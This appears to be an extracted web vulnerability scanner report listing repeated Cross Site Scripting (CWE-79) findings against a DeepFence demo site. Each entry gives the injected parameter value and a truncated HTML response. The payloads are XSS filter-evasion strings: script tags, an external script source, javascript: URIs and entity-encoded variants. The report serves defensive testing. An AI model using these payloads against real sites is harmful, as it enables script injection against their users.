src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #223\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ';alert(String.fromCharCode(88,83,83))//\\';alert(\nString.fromCharCode(88,83,83))//\";alert(String.fromCharCode(\n88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\n\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #224\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '';!--\"<XSS>=&{()}\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #225\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT SRC=http://soapui.org/xss.js></SCRIPT\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #226Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #227\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=javascript:alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #228\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=JaVaScRiPt:alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #229\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=javascript:alert(&quot;XSS&quot;)>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #230\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #231\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #232\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=javascript:alert(String.fromCharCode(88,83,83)\n)>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #233\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105\n;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&\n#39;&#88;&#83;&#83;&#39;&#41;>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79Issue Number #234\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=&#0000106&#0000097&#0000118&#0000097&\n#0000115&#0000099&#0000114&#0000105&#0000112&\n#0000116&#0000058&#0000097&#0000108&#0000101&\n#0000114&#0000116&#0000040&#0000039&#0000088&\n#0000083&#0000083&#0000039&#0000041>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #235\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#\nx69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#\nx27&#x58&#x53&#x53&#x27&#x29>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #236\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"jav ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> 